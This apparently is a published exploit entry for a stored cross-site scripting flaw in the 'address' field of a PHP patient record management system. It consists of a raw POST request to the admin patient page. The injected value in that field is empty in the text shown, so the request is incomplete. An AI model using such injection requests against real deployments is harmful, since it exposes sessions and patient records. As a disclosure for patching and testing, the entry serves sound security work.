# Exploit Title: Health Center Patient Record Management System | 'address' param Stored Cross Site Scripting # Exploit Author: Richard Jones # Date: 2021-03-29 # Vendor Homepage: https://www.sourcecodester.com/php/11058/health-center-patient-record-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=11058&title=Health+Center+Patient+Record+Management+System+using+PHP+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 http://127.0.0.1/hcpms/admin/patient.php POST /hcpms/admin/patient.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------39853461824084458643124946581 Content-Length: 2359 Origin: http://TARGET Connection: close Referer: http://TARGET/hcpms/admin/patient.php Cookie: PHPSESSID=7iaa6u728l50ok9kj16upnbm5k Upgrade-Insecure-Requests: 1 -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="itr_no" 9 -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="family_no" -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="firstname" Tester -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="middlename" Testermid -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="lastname" Testerlast -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="month" 04 -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="day" 06 -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="year" 2013 -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="phil_health_no" -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="address" -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="age" 2 -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="civil_status" Single -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="gender" Male -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="bp" a -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="temp" 2 -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="pr" a -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="rr" a -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="wt" 2 -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="ht" a -----------------------------39853461824084458643124946581 Content-Disposition: form-data; name="save_patient" -----------------------------39853461824084458643124946581--